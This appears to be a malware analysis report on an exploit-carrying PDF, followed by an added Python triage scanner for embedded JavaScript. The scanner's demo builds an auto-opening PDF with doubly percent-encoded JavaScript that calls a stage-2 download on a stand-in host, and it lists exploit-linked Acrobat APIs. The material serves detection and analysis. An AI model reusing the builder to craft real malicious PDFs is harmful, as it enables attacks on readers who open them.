Malicious PDF — malware analysis report

Static analysis result for SHA-256 8400220b8d429602…

Verdict: MALICIOUS
Type: PDF
Size: 45.0 KB
MD5: b03c462cd3536382b3270c59f57877a0
SHA-1: d4ca0935a9e24e694cb246aae5ba10d2335adde9
SHA-256: 8400220b8d4296024c01cd5bd26745619a7daeb6a15bae7e88619a4e737bafa1
Risk Score: 166

Malware Insights

MITRE ATT&CK

  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The file is classified as malicious by the ML classifier and by ClamAV, which matches it as Pdf.Exploit.Agent-36128. It carries JavaScript in a /JS stream (object 8), the usual carrier for PDF reader exploits, and the carved script had to be percent-decoded twice before its final form was recovered. That encoding layering, together with the exploit signature, suggests the script is meant to download and execute a second-stage payload, a common exploit-delivery pattern. Static analysis carved no second stage from the file itself, so the download-and-execute behaviour is an inference from the heuristics and should be confirmed by dynamic analysis.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (4)

  • ClamAV: Pdf.Exploit.Agent-36128 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • ClamAV detection on extracted artifact (critical, EXTRACTED_FILE_CLAMAV)
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator that the sample is a delivery vehicle.
  • JavaScript action (low, PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low, PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0008_000.js
  SHA-256: fe7e70c8170e5d845ec7a30531b67b4351c564941b79e97944607064c5ef8712
  Kind: pdf-javascript-stream
  Source: PDF /JS object 8 at offset 0x1E7
  Size: 45305 bytes

Filename: javascript_obj0008_001.js
  SHA-256: 36294b6a5e41e6880e97309242b72e40f4b4b69489c55e0277c0a493c8b7fed4
  Kind: pdf-javascript-stream
  Source: PDF /JS object 8 at offset 0x20A
  Size: 45555 bytes
  Detection: ClamAV: Pdf.Exploit.Agent-36128
  Obfuscation or payload: unlikely

Filename: legacy_pdfkit_stage_000.js
  SHA-256: d6e8b9e2d64e6c9e973b1934b6582d31e937b68be4b4f0b3352ff619a80e394d
  Kind: deobfuscated-js
  Source: double percent-decoded annotation JavaScript at offset 0x1E7
  Size: 33047 bytes
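Added example, not part of this report or of the analysis pipeline that produced it: a small Python triage scanner that reproduces the two steps the Heuristics and Extracted artifacts sections describe, locating /JavaScript and /JS objects in a PDF, carving the stream (inflating FlateDecode), peeling stacked unescape()/percent-encoding layers the way the "double percent-decoded" artifact above was recovered, and flagging Acrobat JavaScript APIs that commonly appear in exploit and stage-2 download code. The sample PDF it scans is constructed inline (a stage-2 URL under example.invalid, wrapped in eval(unescape(unescape('...')))); it is not the real sample, and the API watch-list is the editor's own, not the scoring rules of the original tool.

```python
"""Triage a PDF for embedded JavaScript: find /JS and /JavaScript objects, carve the
stream (inflating FlateDecode), peel stacked unescape()/percent-encoding layers and
flag Acrobat APIs that commonly appear in exploit and stage-2 download code.
Purpose-built triage scanner, not a conformant PDF parser: it walks "N G obj" headers
linearly (no xref, object streams or encryption), reads only direct integer /Length
values and treats /JS (...) literals naively."""
import re
import urllib.parse
import zlib

OBJ_HDR = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])((?:%[0-9A-Fa-f]{2}|[^'\"\\])*)\1\s*\)")
BARE_PERCENT = re.compile(r"^(?:%[0-9A-Fa-f]{2}|[A-Za-z0-9_.~-])+$")
# Editor's watch-list. Presence is a triage signal, not proof: several are legitimate APIs.
SUSPICIOUS_APIS = [
    b"eval(", b"unescape(", b"util.printf", b"Collab.collectEmailInfo",
    b"app.launchURL", b"this.exportDataObject", b"media.newPlayer",
    b"spell.customDictionaryOpen", b"getIcon(", b"getAnnots(",
    b"app.setTimeOut", b"String.fromCharCode",
]
# Constructed stage-2 fetch stub for the demo PDF; not the real sample's script.
SAMPLE_JS = ('app.launchURL("http://example.invalid/stage2.bin", true); '
             'var note = util.printf("%s", "constructed stage-2 stub");')

def build_sample_pdf(js_source):
    """Constructed PDF: /OpenAction fires object 8, whose /JS points at stream object 9,
    a Flate-compressed eval(unescape(unescape('...'))) wrapper around js_source."""
    outer = urllib.parse.quote(urllib.parse.quote(js_source, safe=""), safe="")
    compressed = zlib.compress(("eval(unescape(unescape('%s')));" % outer).encode())
    pdf = b"%PDF-1.4\n"
    pdf += b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 8 0 R >>\nendobj\n"
    pdf += b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    pdf += b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n"
    pdf += b"8 0 obj\n<< /S /JavaScript /JS 9 0 R >>\nendobj\n"
    pdf += b"9 0 obj\n<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
    pdf += compressed + b"\nendstream\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n"
    return pdf

def read_dict(pdf, pos):
    """Return (dict_bytes, end_offset) for the balanced << ... >> of the object at pos."""
    start, stop = pdf.find(b"<<", pos), pdf.find(b"endobj", pos)
    if start < 0 or (stop >= 0 and start > stop):
        return b"", pos  # object without a dictionary (bare number, array, ...)
    depth, i = 0, start
    while i < len(pdf):
        if pdf.startswith(b"<<", i):
            depth, i = depth + 1, i + 2
        elif pdf.startswith(b">>", i):
            depth, i = depth - 1, i + 2
            if depth == 0:
                return pdf[start:i], i
        else:
            i += 1
    raise ValueError("unbalanced dictionary at offset %d" % start)

def read_stream(pdf, dict_bytes, pos):
    """Carve the stream body following a dictionary; inflate it if /FlateDecode."""
    m = re.match(rb"\s*stream\r?\n", pdf[pos:pos + 16])
    if not m:
        return None
    data_start = pos + m.end()
    length = re.search(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)", dict_bytes)  # direct only
    if length:
        data = pdf[data_start:data_start + int(length.group(1))]
    else:  # indirect /Length: fall back to the endstream keyword
        data = pdf[data_start:pdf.find(b"endstream", data_start)].rstrip(b"\r\n")
    if b"/FlateDecode" in dict_bytes:
        data = zlib.decompressobj().decompress(data)  # tolerates truncated streams
    return data

def peel_unescape_layers(js, max_layers=8):
    """Follow unescape('...') wrappers inward; returns (innermost payload, layers peeled).
    Only %XX is handled; %uXXXX (typical for shellcode) is left for the analyst."""
    text, layers = js.decode("latin-1"), 0
    while layers < max_layers:
        m = UNESCAPE_CALL.search(text)
        if m:
            text = urllib.parse.unquote(m.group(2), encoding="latin-1")
        elif "%" in text and BARE_PERCENT.fullmatch(text):  # bare encoded blob
            text = urllib.parse.unquote(text, encoding="latin-1")
        else:
            break  # real JS (spaces, parens) is never decoded again: "%45000f" stays intact
        layers += 1
    return text.encode("latin-1"), layers

def analyze_pdf(pdf):
    """One finding per object carrying JavaScript, with deobfuscated payload and API hits."""
    objs = {}
    for m in OBJ_HDR.finditer(pdf):
        d, end = read_dict(pdf, m.end())
        objs[int(m.group(1))] = {"offset": m.start(), "dict": d,
                                 "stream": read_stream(pdf, d, end)}
    findings = []
    for num, obj in objs.items():
        d = obj["dict"]
        if b"/JavaScript" not in d and b"/JS" not in d:
            continue
        ref = re.search(rb"/JS\s+(\d+)\s+\d+\s+R", d)  # /JS as indirect stream
        lit = re.search(rb"/JS\s*\((.*?)\)", d, re.S)   # /JS as direct string
        if ref and objs.get(int(ref.group(1)), {}).get("stream") is not None:
            js = objs[int(ref.group(1))]["stream"]
        elif lit:
            js = lit.group(1)
        elif obj["stream"] is not None:
            js = obj["stream"]
        else:
            continue
        payload, layers = peel_unescape_layers(js)
        findings.append({
            "object": num, "offset": obj["offset"], "raw_len": len(js),
            "layers": layers, "payload": payload,
            "apis": [a.decode() for a in SUSPICIOUS_APIS if a in js or a in payload],
            # does the document run it on open (/OpenAction) or from an /AA event?
            "auto_trigger": bool(re.search(rb"/(OpenAction|AA)\s+%d\s+\d+\s+R" % num, pdf)),
        })
    return findings

if __name__ == "__main__":
    for f in analyze_pdf(build_sample_pdf(SAMPLE_JS)):
        print("object %d at offset 0x%X: %d bytes, %d encoding layer(s), auto-trigger=%s"
              % (f["object"], f["offset"], f["raw_len"], f["layers"], f["auto_trigger"]))
        print("  suspicious APIs: " + ", ".join(f["apis"]))
        print("  payload: " + f["payload"].decode("latin-1"))
```

Run it against a real sample with analyze_pdf(open(path, "rb").read()); the offset and object number line up with the "PDF /JS object N at offset 0x..." source field of the artifact table, and the layers count tells you how many percent-decoding passes the analyst would otherwise do by hand. The decoder only strips a layer when it sees an unescape() call or a blob made purely of %XX and unreserved characters, so format strings inside recovered JavaScript (a printf "%45000f"-style argument, say) are not mangled by an extra pass.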